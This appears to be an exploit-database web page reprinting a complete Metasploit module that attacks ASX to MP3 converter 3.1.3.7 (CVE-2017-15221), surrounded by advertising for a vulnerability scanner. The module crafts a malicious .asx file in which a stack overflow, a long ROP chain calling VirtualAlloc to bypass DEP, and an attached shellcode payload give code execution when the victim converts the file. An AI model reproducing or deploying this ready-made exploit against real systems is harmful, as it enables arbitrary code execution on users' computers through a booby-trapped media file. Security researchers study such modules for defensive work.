asx to mp3 converter 3.1.3.7 .asx local stack overflow (dep bypass) (metasploit)

▸▸▸ Exploit & Vulnerability >>   local exploit & linux vulnerability




Online Vulnerability Scanner Tools
asx to mp3 converter 3.1.3.7 .asx local stack overflow (dep bypass) (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
      'Description'    => %q{
       This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
       By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
       application, a buffer is overwritten, which allows for running shellcode.
	   Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
	              Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Maxim Guslyaev', # EDB POC, Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2017-15221' ],
          [ 'EDB', '47468' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 7 Enterprise/10 Pro',
            {
              'Ret' => 0x1002D038 # RET
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x09\x0a"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Oct 06 2019",
      'DefaultTarget'  => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
    ])
  end

  def exploit
  
	buf = "http://"
	buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

	## Save allocation type (0x1000) in EDX
	buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
	buf += [0x11111111].pack("V")
	buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
	buf += [0x1002D493].pack("V") # POP EDX # RETN
	buf += [0xEEEEFEEF].pack("V")
	buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
	buf += [0x41414141].pack("V")

	## Save the address of VirtualAlloc() in ESI
	buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
	buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
	buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
	buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
	buf += [0x41414141].pack("V")
	buf += [0x41414141].pack("V")

	## Save the size of the block in EBX
	buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
	buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

	## Save the address of (# ADD ESP,8 # RETN) in EBP
	buf += [0x10031c6c].pack("V") # POP EBP # RETN
	buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
	#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

	## Save memory protection code (0x40) in ECX
	buf += [0x1002ca22].pack("V") # POP ECX # RETN
	buf += [0xFFFFFFFF].pack("V")
	buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
	buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

	## Save ROP-NOP in EDI
	buf += [0x1002e346].pack("V") # POP EDI # RETN
	buf += [0x1002D038].pack("V") # RETN

	## Save NOPs in EAX
	#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
	#buf += [0x90909090].pack("V") # nop

	## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
	buf += [0x1002E516].pack("V") # POP EAX # RETN
	buf += [0xA4E2F275].pack("V")
	buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
	buf += [0x10040ce5].pack("V") # PUSH EAX # RETN

	buf += "\x90" * 4
	buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
	buf += "\x90" * 20
	buf += payload.encoded

    file_create(buf)
	
  end
end

Asx to mp3 converter 3.1.3.7 .asx local stack overflow (dep bypass) (metasploit) Vulnerability / Exploit Source : Asx to mp3 converter 3.1.3.7 .asx local stack overflow (dep bypass) (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.